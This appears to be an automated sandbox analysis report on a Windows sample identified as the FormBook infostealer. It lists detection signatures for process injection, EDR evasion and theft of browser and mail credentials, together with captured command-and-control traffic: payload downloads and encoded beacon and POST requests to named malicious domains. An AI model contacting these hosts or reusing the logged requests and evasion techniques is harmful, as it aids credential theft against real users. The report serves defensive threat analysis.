Windows Analysis Report
9B1ZyhsFUq.exe

Overview

General Information

Sample name:	9B1ZyhsFUq.exe renamed because original name is a hash value
Original sample name:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5.exe
Analysis ID:	1483420
MD5:	0c7b233a4bf0fc22c9e2a49818bc90a1
SHA1:	026eeec2d42c9f20c66e9c9bd52f495e83a689f0
SHA256:	d1743c107eedb9e740537df6cd35db93dd2a45ea952f4712ca134846dba1c7e5
Tags:	exeinvestdirectinsurance-com
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Multi AV Scanner detection for domain / URL

Source: www.jl884.vip	Virustotal: Detection: 7%			Perma Link
Source: http://www.firmshow.top/02nb/	Virustotal: Detection: 5%			Perma Link

Multi AV Scanner detection for submitted file

Source: 9B1ZyhsFUq.exe	Virustotal: Detection: 40%			Perma Link
Source: 9B1ZyhsFUq.exe	ReversingLabs: Detection: 55%

Yara detected FormBook

Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.10:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49711 version: TLS 1.2

Source: 9B1ZyhsFUq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: convert.pdb source: MSBuild.exe, 00000008.00000002.1718928304.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510127771.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000003.1658038940.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Outputs\Sepaiw.pdb source: 9B1ZyhsFUq.exe
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000000.1642483698.0000000000A4E000.00000002.00000001.01000000.00000007.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000000.1785866457.0000000000A4E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.1719109006.0000000003394000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.1721287038.0000000003546000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 0000000B.00000003.1719109006.0000000003394000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.000000000388E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2511816006.00000000036F0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.1721287038.0000000003546000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: convert.pdbGCTL source: MSBuild.exe, 00000008.00000002.1718928304.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000002.2510127771.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000A.00000003.1658038940.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\convert.exe

Code function: 11_2_0301BB30 FindFirstFileW,FindNextFileW,FindClose,

11_2_0301BB30

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\9B1ZyhsFUq.exe	Code function: 4x nop then dec eax	0_2_00007FF7C19335BD
Source: C:\Windows\SysWOW64\convert.exe	Code function: 4x nop then xor eax, eax	11_2_03009720
Source: C:\Windows\SysWOW64\convert.exe	Code function: 4x nop then mov ebx, 00000004h	11_2_035C0548
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 4x nop then xor eax, eax	13_2_04B5B7B5

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.cloudsoda.xyz
Source:	DNS query: www.d99qtpkvavjj.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Footer.cli HTTP/1.1Host: investdirectinsurance.comConnection: close
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Oszina.cli HTTP/1.1Host: investdirectinsurance.comConnection: close

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 203.161.43.228 203.161.43.228
Source: Joe Sandbox View	IP Address: 38.47.158.215 38.47.158.215

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 172.67.189.102:443 -> 192.168.2.10:49705 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Footer.cli HTTP/1.1Host: investdirectinsurance.comConnection: close
Source: global traffic	HTTP traffic detected: GET /assuence/litesolidCha/Oszina.cli HTTP/1.1Host: investdirectinsurance.comConnection: close
Source: global traffic	HTTP traffic detected: GET /r4wk/?odlXV=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOJebRDbzl2T1aaRGoo2pz4PsH3zqV1w==&3rb=9LUll6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl884.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /r4rr/?odlXV=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljkp3kSKvDFIaS2JqmarYyLC+gwYZSBQ==&3rb=9LUll6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.d99qtpkvavjj.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /02nb/?odlXV=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71fP4xTcu1wI0JIyM1RMLSZxEp7JGf5Q==&3rb=9LUll6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.firmshow.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /g67v/?odlXV=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNBbovzA8U6SAL2sR/6tcpi17CTcO2sg==&3rb=9LUll6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.jl800.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: investdirectinsurance.com
Source: global traffic	DNS traffic detected: DNS query: www.jl884.vip
Source: global traffic	DNS traffic detected: DNS query: www.cloudsoda.xyz
Source: global traffic	DNS traffic detected: DNS query: www.d99qtpkvavjj.xyz
Source: global traffic	DNS traffic detected: DNS query: www.firmshow.top
Source: global traffic	DNS traffic detected: DNS query: www.jl800.vip
Source: global traffic	DNS traffic detected: DNS query: www.theridleysuk.co.uk

Source: unknown

HTTP traffic detected: POST /r4rr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 194Host: www.d99qtpkvavjj.xyzOrigin: http://www.d99qtpkvavjj.xyzReferer: http://www.d99qtpkvavjj.xyz/r4rr/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 6f 64 6c 58 56 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 51 61 54 48 68 58 48 37 6c 34 6f 78 50 68 70 4b 6b 42 2f 70 68 66 6b 61 4c 6d 4c Data Ascii: odlXV=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzQaTHhXH7l4oxPhpKkB/phfkaLmL

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:38 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:41 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:43 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 09:40:46 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>

